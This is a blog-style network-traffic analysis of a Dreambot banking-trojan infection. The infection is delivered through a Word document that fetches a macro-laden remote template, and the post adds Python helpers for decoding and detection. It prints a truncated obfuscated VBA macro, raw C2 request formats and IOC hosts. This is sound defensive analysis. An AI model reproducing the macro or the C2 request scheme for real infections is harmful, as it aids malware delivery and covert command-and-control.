Analyzing network traffic from the latest Dreambot infection dropped by a malicious document targeting Poland. The Any.Run analyses are available for both the early stage and the infection with Dreambot. The point of this analysis is to understand what the malware does using only the captured traffic, so there won’t be anything newly discovered here ;)

Table of contents

  1. Table of contents

  2. Analysis

    1. Setting Up
    2. First Contact
    3. Malware Download
    4. Dreambot traffic
  3. IOCs

Analysis

Setting up

Before starting the analysis of network traffic, let’s quickly sum up what we’ll need during this task. Of course, all of the packet inspection will be done using Wireshark, but with a slightly different configuration than the one we’re used to seeing in a default installation. For me, the best write-up of such a configuration is this Palo Alto post by @malwaretraffic.

Setting up columns in Wireshark

Having that set up, let’s jump into traffic.

First contact

While scrolling through the traffic, starting from the moment I enabled the capture, at 9:26:46 there was a DNS query to salesforcelead[.]com, which a few packets later was answered with the IP address 192.185.225.131.

DNS resolution of salesforcelead

Keeping both domain name and IP address in mind, we can move on through the traffic. Right after the resolution, we can see an OPTIONS request to that server.

Options request to salesforcelead

Content of the request can be seen below.

OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: salesforcelead.com

Viewing the TCP stream used in that part of the communication, we can see the full exchange, in which there is later a HEAD request to the path templ-12395.dotm.

Network stream between salesforcelead

Those .dotm files are document templates created by Microsoft Word, which may contain information such as layouts, settings or macros that will later be used in a document. Exporting it through Wireshark and analyzing it with olevba, we can see macros that were not in the initial document.

$ file templ-12395.dotm 
templ-12395.dotm: Microsoft Word 2007+

$ olevba templ-12395.dotm
olevba 0.54.2 on Python 3.7.4 - http://decalage.info/python/oletools
===============================================================================
FILE: templ-12395.dotm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Private Sub BMTBTe(KRykaVjys As String)
For VfElNcjOj = 55 To 130
Debug.Print VfElNcjOj
Next VfElNcjOj
Dim EQokWwAcTENjea As Boolean
EQokWwAcTENjea = True
Dim dsCsCOYPrSJwP As Integer
dsCsCOYPrSJwP = 29715
Dim YBJmUnaDadMTjfCmTNQh As Long
YBJmUnaDadMTjfCmTNQh = 174955045
Dim xAXbKsBuCkiMqCtnzagQSEecU As String
xAXbKsBuCkiMqCtnzagQSEecU = "65624568437165474b585959644d6" & "95a536e7249576e"
Dim yjAhvKrJgfCe As String
yjAhvKrJgfCe = "666e70754945746658784d4779644" & "27a684e616c7472757145"
Dim kGuQWEqHRwaimEqNq As Integer
kGuQWEqHRwaimEqNq = 28009
For CXrXALPEUrVglFTozGuDdQA = 6 To 192
Debug.Print CXrXALPEUrVglFTozGuDdQA
...

Because this post is focused on analyzing network traffic, let’s take one last quick look at these macros and move on with the analysis.

+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Autoopen            |Runs when the Word document is opened        |
|Suspicious|Run                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Hex String|ebEhCqeGKXYYdM      |65624568437165474b585959644d                 |
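olevba decodes each string literal on its own, which is why the table above lists only ebEhCqeGKXYYdM for a value that the macro builds from two literals joined with `&`. The Python below is an added example (mine, not code from the post or from oletools) that joins the split literals of each assignment and hex-decodes the result. The two assignments are copied from the olevba output above; they decode to more random-looking letters, in line with the padding variables around them, but the same routine applies to any hex-encoded string split this way.

```python
import re

# Lines copied from the olevba output above: the "&" concatenation is what
# hides the full value from a per-literal hex scan.
VBA_SAMPLE = '''
Dim xAXbKsBuCkiMqCtnzagQSEecU As String
xAXbKsBuCkiMqCtnzagQSEecU = "65624568437165474b585959644d6" & "95a536e7249576e"
Dim yjAhvKrJgfCe As String
yjAhvKrJgfCe = "666e70754945746658784d4779644" & "27a684e616c7472757145"
Dim kGuQWEqHRwaimEqNq As Integer
kGuQWEqHRwaimEqNq = 28009
'''

# An assignment whose right-hand side is only "..." & "..." & ... literals.
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*("[^"]*"(?:\s*&\s*"[^"]*")*)\s*$')
LITERAL_RE = re.compile(r'"([^"]*)"')
HEX_RE = re.compile(r'^[0-9a-fA-F]+$')


def join_string_literals(vba_source):
    """Map variable name -> concatenated value for every assignment built
    purely from string literals (numeric assignments are ignored)."""
    joined = {}
    for line in vba_source.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            name, rhs = m.group(1), m.group(2)
            joined[name] = ''.join(LITERAL_RE.findall(rhs))
    return joined


def decode_hex_strings(vba_source):
    """Return {name: decoded_text} for joined values that are valid,
    even-length hex; anything else is left out of the result."""
    decoded = {}
    for name, value in join_string_literals(vba_source).items():
        if len(value) % 2 == 0 and HEX_RE.match(value):
            raw = bytes.fromhex(value)
            # Replace non-printable bytes so the output is safe to print.
            decoded[name] = ''.join(chr(b) if 32 <= b < 127 else '.' for b in raw)
    return decoded


if __name__ == '__main__':
    for name, text in decode_hex_strings(VBA_SAMPLE).items():
        print(f'{name} -> {text!r}')
```

Running it prints the two joined values in full, so the first one comes out as the 22 characters ebEhCqeGKXYYdMiZSnrIWn rather than the 14 that olevba reported from the first literal alone.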

Malware Download

At around 9:27:24, we can see a DNS query to greenedus.com, which resolves to the IP address 107.179.19.96.

Request downloading malware from greenedus

In addition to that, after the query there is a request to the path /wp-content/uploads/2019/09/FergKLrS.bin, which downloads a binary from that server.

Greenedus serving Dreambot

Exporting it and checking the MD5 hash of the binary, we can confirm it’s the same Dreambot sample.

$ file FergKLrS.bin 
FergKLrS.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
$ md5sum FergKLrS.bin 
a908e3261ee99c8fe331293b2fc11d6f  FergKLrS.bin

Dreambot Traffic

After the file is downloaded, at around 9:28:31, we start noticing a bunch of DNS queries to services such as OpenDNS and CurlMyIP.

Ursnif queries OpenDNS

We can also see a CurlMyIP request, whose response sends back the IP address of the machine on which this sample was running.

Immediately after that, there is a DNS query to intraders-support.at, which resolves to the IP address 83.17.95.246.

C2 Communication

We can also see that the sample requests different paths on the C2 server, using both POST and GET.

GET request:

GET /images/fN3m6JvsPQWfsw6bMmGn1/S_2F_2Fqjy6_2BbC/q_2BOf20dI61I4l/sIR6dJYpMmWr2eYsZa/CrvpmDF4P/7ertwODW3rpUe8o3US0m/_2B0acqJXrs8Oud4n12/GakiNCH2OtShYAdavYi8vH/oBEnzEVy8tC0J/_2Bxfslj/j9YOnK_2B1Vd50CmoRd2goL/gNXs89S60FmB/NTuJdgtdO/i.gif HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: intraders-support.at

HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 08 Nov 2019 10:30:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close

POST request:

POST /images/C4q015fd6ogM9Piz/XCWXZqoJOGKW0cu/H3p332yg6iJY8m5LgY/CTufivLsP/SwPg4o0TTUaFVDeraIIB/HpK8PCWGC5JYhOjleUU/DXrLT8x64Pdf_2FiDSfhH5/yVuvg7utdcDLY/mVOvIJI3/nIE87JNf5Ct_2BHD97pWg7W/B5O6lr7vcr/UWsvNkkd9TFVZkJFv/rcgDk_2FXW6w/x2YsKRJdX/4SuMD975/j.bmp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=37855366842641924893916413627
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Content-Length: 449
Host: intraders-support.at

--37855366842641924893916413627
Content-Disposition: form-data; name="upload_file"; filename="67B3.bin"

.l...b.37.[...p.B...(m..U
..f..l...Y.`R.s;B.;P+.J..\8.t..YX.!2..."T..m..-j+.CpO<A}.g{h...}...R...I.e.}[.Z].....68.rI4....t...M....L(:.q.. .1.....S;x.......oy.7F..C...(..!f^8..N-..~.|QC.c....../`.....	..._0....M...:.x.......q.'.8]l.y.;.4...z...A........Rs.=..,....4$j.......=5.9!4......z.eRN.....BH...x".q
--37855366842641924893916413627--
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 08 Nov 2019 10:25:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close

And that’s it for the traffic: after that, the C2 and the sample communicated using only those URLs, meaning that the malware successfully made itself at home.
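As an added example (mine, not code from the post) of turning the observations above into a check, the Python below parses raw HTTP request heads and flags the two behaviours seen in this capture: Word’s own user agent probing a web server and fetching a .dotm template, and the Dreambot-style C2 URIs (a deep path under /images/, a .gif or .bmp suffix, and the _2B/_2F tokens that stand in for the ‘+’ and ‘/’ of base64 in Ursnif URLs). The OPTIONS, GET and POST requests are copied from the post with some headers trimmed, the HEAD request is reconstructed from the description (only the OPTIONS request was printed), and the last request is a constructed benign one to show the checks stay quiet on ordinary traffic.

```python
import re

# Request heads from the capture in the post (headers trimmed), one
# reconstructed HEAD request, and one constructed benign request.
REQUESTS = [
    """OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: salesforcelead.com
""",
    """HEAD /templ-12395.dotm HTTP/1.1
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
Host: salesforcelead.com
""",
    """GET /images/fN3m6JvsPQWfsw6bMmGn1/S_2F_2Fqjy6_2BbC/q_2BOf20dI61I4l/sIR6dJYpMmWr2eYsZa/CrvpmDF4P/7ertwODW3rpUe8o3US0m/_2B0acqJXrs8Oud4n12/GakiNCH2OtShYAdavYi8vH/oBEnzEVy8tC0J/_2Bxfslj/j9YOnK_2B1Vd50CmoRd2goL/gNXs89S60FmB/NTuJdgtdO/i.gif HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: intraders-support.at
""",
    """POST /images/C4q015fd6ogM9Piz/XCWXZqoJOGKW0cu/H3p332yg6iJY8m5LgY/CTufivLsP/SwPg4o0TTUaFVDeraIIB/HpK8PCWGC5JYhOjleUU/DXrLT8x64Pdf_2FiDSfhH5/yVuvg7utdcDLY/mVOvIJI3/nIE87JNf5Ct_2BHD97pWg7W/B5O6lr7vcr/UWsvNkkd9TFVZkJFv/rcgDk_2FXW6w/x2YsKRJdX/4SuMD975/j.bmp HTTP/1.1
Content-Type: multipart/form-data; boundary=37855366842641924893916413627
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Content-Length: 449
Host: intraders-support.at
""",
    # Constructed benign request: same /images/ prefix and .gif suffix, nothing else.
    """GET /images/logo.gif HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/70.0
Host: www.example.com
""",
]

TEMPLATE_EXT = ('.dotm', '.dotx', '.dot')
ENCODED_TOKEN = re.compile(r'_2[BF]')   # base64 '+' and '/' rewritten as _2B / _2F


def parse_request(raw):
    """Split a raw HTTP request head into (method, path, headers dict)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(' ', 2)
    headers = {}
    for line in lines[1:]:
        if ':' in line:
            name, value = line.split(':', 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def triage(raw):
    """Return the reasons a request resembles the traffic in the post
    (an empty list means nothing matched)."""
    method, path, headers = parse_request(raw)
    ua = headers.get('user-agent', '')
    reasons = []

    # 1. Office itself talking to a web server: probing, then a template fetch.
    office_ua = ua.startswith('Microsoft Office') or 'x-office-major-version' in headers
    if office_ua and method == 'OPTIONS':
        reasons.append('office-ua OPTIONS probe')
    if office_ua and path.lower().endswith(TEMPLATE_EXT):
        reasons.append('office-ua template fetch ' + path.rsplit('/', 1)[-1])

    # 2. Dreambot-style C2 URI: many random segments under /images/, an image
    #    suffix, and _2B/_2F tokens inside the path.
    segments = [s for s in path.split('/') if s]
    if (path.startswith('/images/') and path.lower().endswith(('.gif', '.bmp'))
            and len(segments) >= 6 and ENCODED_TOKEN.search(path)):
        reasons.append(f'dreambot-style {method} uri ({len(segments)} segments)')
        if 'MSIE 8.0' in ua:
            reasons.append('ie8 user-agent')
    return reasons


def triage_all(requests):
    """Map 'METHOD host' -> reasons for every request that matched."""
    out = {}
    for raw in requests:
        method, _path, headers = parse_request(raw)
        reasons = triage(raw)
        if reasons:
            out[f"{method} {headers.get('host', '?')}"] = reasons
    return out


if __name__ == '__main__':
    for key, reasons in triage_all(REQUESTS).items():
        print(key, '->', '; '.join(reasons))
```

The segment threshold and the /images/ prefix are tuned to this one sample; in real logs the _2B/_2F tokens combined with an image suffix on a long random path are the part worth keeping, and the Office user agent check is useful on its own for spotting remote template fetches from hosts that are not Microsoft’s.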

IOCs

Domains:

salesforcelead[.]com|192.185.225[.]131
greenedus[.]com|107.179.19[.]96
intraders-support[.]at|83.17.95[.]246

URLs:

salesforcelead[.]com/templ-12395.dotm
greenedus[.]com//wp-content/uploads/2019/09/FergKLrS.bin